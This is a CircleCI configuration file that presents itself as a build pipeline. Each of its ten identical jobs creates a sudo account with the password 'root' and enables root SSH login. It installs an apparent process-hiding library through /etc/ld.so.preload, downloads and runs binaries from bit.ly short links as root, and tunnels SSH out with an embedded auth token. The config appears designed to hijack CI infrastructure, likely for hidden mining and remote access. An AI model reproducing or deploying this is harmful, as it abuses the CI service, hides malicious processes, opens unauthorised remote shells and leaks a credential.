version: 2.1
jobs:
  pnd01:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd02:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd03:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd04:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd05:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd06:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd07:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd08:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd09:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"
  pnd10:
    docker:
      - image: circleci/ruby:2.5.3
    steps:
      - run:
         name: Part 01
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" panda
          sudo su --command "adduser panda sudo"
          sudo su --command "echo 'panda:root' | chpasswd"          
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config"
          sudo su --command "echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config"
          sudo service ssh restart
      - run: 
         name: Part 02
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/sembunyi.tar.gz
          tar -xvf sembunyi.tar.gz && cd sembunyi
          sudo su --command "make"
          sudo su --command "sudo mv libsembunyi.so /usr/local/lib/"
          sudo su --command "echo /usr/local/lib/libsembunyi.so >> /etc/ld.so.preload"
          wget https://bit.ly/3Iaxfe5
          chmod +x 3Iaxfe5
          sudo su --command "./3Iaxfe5 authtoken 22C7VwXrq4Il2k2yC4VgKYjNhsd_i6CaqAafAJ6AAHAjdixY"
          sudo su --command "nohup ./3Iaxfe5 tcp 22 --log=stdout > sesah.log &"
          sleep 3
          sudo su --command "cat sesah.log"
      - run: 
         name: Part 03
         command: |
          wget https://bit.ly/3BsaT4Q
          chmod +x 3BsaT4Q
          sudo su --command "./3BsaT4Q"


workflows:
  version: 2.1
  build:
    jobs:
      - pnd01
      - pnd02
      - pnd03
      - pnd04
      - pnd05
      - pnd06
      - pnd07
      - pnd08
      - pnd09
      - pnd10